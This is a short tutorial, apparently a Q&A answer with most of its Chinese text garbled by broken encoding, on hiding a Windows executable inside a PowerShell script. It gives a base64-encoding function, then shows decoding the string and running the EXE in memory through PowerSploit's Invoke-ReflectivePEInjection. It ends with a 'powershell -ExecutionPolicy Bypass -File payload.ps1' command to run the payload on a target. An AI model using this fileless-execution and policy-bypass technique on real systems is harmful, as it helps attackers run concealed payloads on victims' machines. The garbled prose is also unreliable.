1.å°äºè¿å¶æ件è¿è¡ base64 ç¼ç
å¯ä»¥ä½¿ç¨ä»¥ä¸å½æ°ï¼
function Convert-BinaryToString {
[CmdletBinding()] param (
[string] $FilePath
)
try {
$ByteArray = [System.IO.File]::ReadAllBytes($FilePath);
}
catch {
throw "Failed to read file. Ensure that you have permission to the file, and that the file path is correct.";
}
if ($ByteArray) {
$Base64String = [System.Convert]::ToBase64String($ByteArray);
}
else {
throw '$ByteArray is $null.';
}
Write-Output -InputObject $Base64String;
}
2. æå¦ä¸è¿ç¨å建ä¸ä¸ªæ°çèæ¬
1.ç¨ä¸ä¸æ¥çæ¹æ³å° EXE æ件转为å符串ï¼
2.åå¤ Invoke-ReflectivePEInjectionï¼Powersploit project çä¸é¨åï¼ï¼
3.å°å符串转为åèæ°ç»ï¼
4.è°ç¨ Invoke-ReflectivePEInjectionã
æ以ï¼äºè¿å¶æ件åªæ¯ Powershell èæ¬ä¸çä¸æ®µå符串ï¼å¨å°å符串解ç 为äºè¿å¶æ°ç»åï¼å°±å¯ä»¥è°ç¨ Invoke-ReflectivePEInjection ç´æ¥å¨å
åä¸è¿è¡ã
æåçèµ·æ¥åè¿æ ·ï¼
# base64 ç¼ç çäºè¿å¶æ件
$InputString = '...........'
function Invoke-ReflectivePEInjection
{
......
......
......
}
# å°äºè¿å¶å符串转为åèæ°ç»
$PEBytes = [System.Convert]::FromBase64String($InputString)
# å¨å
åä¸è¿è¡ EXE
Invoke-ReflectivePEInjection -PEBytes $PEBytes -ExeArgs "Arg1 Arg2 Arg3 Arg4"
ç°å¨å°±å¯ä»¥å¨ç®æ ä¸è¿è¡èæ¬äºï¼
powershell -ExecutionPolicy Bypass -File payload.ps1
温馨提示:答案为网友推荐,仅供参考